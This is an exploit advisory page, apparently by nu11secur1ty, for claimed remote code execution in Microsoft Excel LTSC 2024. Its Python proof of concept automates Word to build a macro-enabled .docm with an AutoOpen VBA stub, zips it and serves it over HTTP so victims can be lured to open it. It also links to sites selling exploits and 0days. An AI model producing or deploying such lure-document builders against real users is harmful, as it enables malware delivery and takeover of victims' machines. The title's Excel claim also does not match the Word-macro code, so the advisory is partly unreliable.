Microsoft Excel LTSC 2024远程代码执行
日期: 2025.07.31
作者: nu11secur1ty
风险等级: 高
本地利用: 否
远程利用: 是
CVE编号: CVE-2025-27751 | CVE-2025-47957
CWE: 暂无
漏洞描述
攻击者可以通过电子邮件或流媒体服务器发送恶意的DOCX文件,诱骗任何用户打开并执行其代码。受害者执行后,其机器可能被感染,甚至造成比以往更严重的后果——这可能是其Windows机器的终结!警告:请立即在Office 365中禁用宏选项!
状态: 高危漏洞
利用代码
#!/usr/bin/python
# CVE-2025-47957 by nu11secur1ty
import os
import time
import zipfile
import threading
import http.server
import socket
import socketserver
import win32com.client
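def get_local_ip():
    """Return the IPv4 address of the interface that routes to the internet.

    Opens a UDP socket and "connects" it to a public address. For UDP this
    sends no packet; it only makes the kernel choose a source address, which
    is then read back with getsockname(). Falls back to the loopback address
    when no route is available.

    Returns:
        str: dotted-quad IPv4 address, or "127.0.0.1" on failure.
    """
    try:
        # The context manager closes the socket even when connect() raises;
        # the original only closed it on the success path.
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.connect(("8.8.8.8", 80))  # public DNS address, used only to pick a route
            return s.getsockname()[0]
    except OSError:
        # Narrowed from a bare `except:` so that KeyboardInterrupt/SystemExit
        # are no longer swallowed; only socket/network errors fall back.
        return "127.0.0.1"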
def create_docm_with_auto_macro(filename):
    """Build a macro-enabled Word document (.docm) whose macro runs on open.

    Drives a hidden Word instance over COM, inserts a VBA module containing
    an AutoOpen procedure, and saves the result next to this script. The
    procedure body is a placeholder ("YOUR_EXPLOIT_HERE" / "YOUR_TASK_HERE");
    nothing on this page defines what it holds.

    AutoOpen is one of Word's auto-execute macro names, so the module runs
    only for a user who has macros enabled — which is why the advisory's own
    mitigation is to keep macros disabled. An AutoOpen procedure inside a
    .docm is also the usual indicator that macro-scanning gateways flag.

    Args:
        filename: file name (not a path) of the document to create; it is
            written into the directory containing this script.

    Returns:
        str: absolute path of the saved .docm file.

    Raises:
        Whatever win32com raises when a COM call fails (e.g. Word not
        installed, or VBA project access blocked); nothing is caught here.
    """
    script_dir = os.path.dirname(os.path.abspath(__file__))
    full_path = os.path.join(script_dir, filename)
    # Headless Word instance; the user running this script sees no window.
    word = win32com.client.Dispatch("Word.Application")
    word.Visible = False
    doc = word.Documents.Add()
    doc.Content.Text = "此文档包含自动启动的宏"
    # NOTE(review): programmatic access to doc.VBProject is gated by the
    # Office Trust Center option "Trust access to the VBA project object
    # model"; when that option is off (believed to be the default) this
    # line raises a COM error — confirm on the Office build in use.
    vbproject = doc.VBProject
    vbcomponent = vbproject.VBComponents.Add(1)  # 1 = standard module (vbext_ct_StdModule)
    macro_code = '''
Sub AutoOpen()
Call YOUR_PoC
End Sub
Sub YOUR_PoC()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "YOUR_EXPLOIT_HERE"
TaskID = YOUR_TASK_HERE
If Err <> 0 Then
MsgBox "无法启动 " & Program
End If
End Sub
'''
    vbcomponent.CodeModule.AddFromString(macro_code)
    wdFormatXMLDocumentMacroEnabled = 13  # Word enum value for the macro-enabled XML document format
    doc.SaveAs(full_path, FileFormat=wdFormatXMLDocumentMacroEnabled)
    # NOTE(review): there is no try/finally around the COM calls above — if
    # any of them raises, doc.Close()/word.Quit() are skipped and a hidden
    # WINWORD.EXE process is left running.
    doc.Close()
    word.Quit()
    print(f"[+] 宏启用的.docm文件保存在: {full_path}")
    return full_path
def compress_to_zip(filepath):
    """Wrap *filepath* in a ZIP archive written next to it.

    The archive is named ``<filepath>.zip`` and contains the single file
    under its base name, so no directory components from *filepath* are
    recorded. ZipFile's default compression (ZIP_STORED) is used.

    Args:
        filepath: path of the file to archive.

    Returns:
        str: path of the created ZIP archive.

    Raises:
        OSError: if *filepath* cannot be read or the archive cannot be written.
    """
    archive_path = f"{filepath}.zip"
    member_name = os.path.basename(filepath)
    with zipfile.ZipFile(archive_path, "w") as archive:
        archive.write(filepath, arcname=member_name)
    print(f"[+] 压缩为ZIP文件: {archive_path}")
    return archive_path
def start_http_server(directory, port=8000):
    """Serve the contents of *directory* over plain HTTP in the background.

    The process working directory is switched to *directory* — note that
    os.chdir() is process-wide, so every later relative path in the caller
    is resolved there too — and a SimpleHTTPRequestHandler, which serves
    from the cwd, is attached to a TCPServer. The serving loop runs in a
    daemon thread so the caller keeps control of the main thread.

    Args:
        directory: directory to expose.
        port: TCP port to listen on (default 8000).

    Returns:
        socketserver.TCPServer: the running server; stop it with shutdown().

    Raises:
        OSError: from TCPServer if the port cannot be bound.
    """
    os.chdir(directory)
    listener = socketserver.TCPServer(
        ("", port),  # "" binds every local interface, not only the LAN address printed below
        http.server.SimpleHTTPRequestHandler,
    )
    print(f"[+] HTTP服务器运行在: http://{get_local_ip()}:{port}/")
    worker = threading.Thread(target=listener.serve_forever, daemon=True)
    worker.start()
    return listener
if __name__ == "__main__":
    # Build the macro-enabled document next to this script, wrap it in a
    # ZIP, then serve that directory until Ctrl+C.
    filename = "CVE-2025-47957.docm"
    docm_path = create_docm_with_auto_macro(filename)
    zip_path = compress_to_zip(docm_path)  # return value is not used afterwards
    # start_http_server() calls os.chdir() on this directory as a side effect.
    server = start_http_server(os.path.dirname(docm_path))
    try:
        print("[*] 服务器运行中 — 按Ctrl+C停止...")
        while True:
            time.sleep(1)  # keep the main thread alive; the server thread is a daemon
    except KeyboardInterrupt:
        print("\n[!] 检测到Ctrl+C — 正在关闭服务器...")
        # NOTE(review): shutdown() only stops serve_forever(); the listening
        # socket is never released because server.server_close() is not called.
        server.shutdown()
        print("[+] 漏洞利用服务器已停止。再见!")
复现链接
视频演示
漏洞利用购买
购买链接
时间花费
01:37:00
系统管理员 - 基础设施工程师
渗透测试工程师
漏洞开发人员: https://packetstormsecurity.com/
相关链接:
https://cve.mitre.org/index.html
https://cxsecurity.com/ 和 https://www.exploit-db.com/
0day漏洞数据库: https://0day.today/
主页: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty http://nu11secur1ty.com/